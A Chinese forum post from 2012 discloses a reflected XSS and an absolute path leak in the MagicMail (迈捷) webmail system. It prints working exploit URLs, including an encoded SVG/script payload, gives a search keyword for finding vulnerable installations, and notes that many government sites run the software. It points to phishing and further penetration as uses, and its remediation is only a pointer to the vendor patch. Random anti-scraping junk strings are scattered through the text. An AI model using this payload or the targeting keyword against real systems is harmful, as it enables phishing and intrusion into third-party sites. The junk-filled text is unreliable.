找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1809|回复: 0
打印 上一主题 下一主题

MagicMail迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:38:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
* {0 s0 S$ k4 a) l; a* \$ g
! P3 e6 M% _# O8 Y% }& ~
8 j7 g$ g; m3 f! I2 l7 x包含  一个反射性XSS  以及  绝对路径泄漏
0 s' _4 _4 e5 J5 Q3 e: A& A. h看了看 貌似全部是linux的。) u( ]" H( r, A& K/ L
7 h9 [& ?8 p, g& O3 |3 M- C
关键字:迈捷邮件系统 by MagicMail
8 F% N5 t1 V" H+ X7 p+ f% {! L5 T
  h3 V2 t+ D7 f& y可以看到很多政府网站都用这个邮件系统
5 r  h+ a. |1 S9 t3 U7 q  m0 n/ V3 E4 x7 U% e2 n
绝对路径 http://madman.in/index.php?login_type=declare&language=
2 l3 d& G* G5 s  |+ T& y
  j& C# i; M5 H7 y9 [) ^( j& E, r3 ~4 b2 d" [' @" b

) P! D6 ~, O: H& wXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E- }1 A2 h5 T& P1 S3 z# K" ~
; k. y5 m% Z# I# G8 w( p% }

, U, {- I; j& N# e3 P$ i
2 M# x0 ?- s' m2 ?: S0 |% x: c( K虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等1 p( X/ |. \" w) T
4 ^1 b: G  q! o: C5 F
修复方案:看官方补丁吧。5 b- a; o1 O3 h4 l4 I. U9 [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表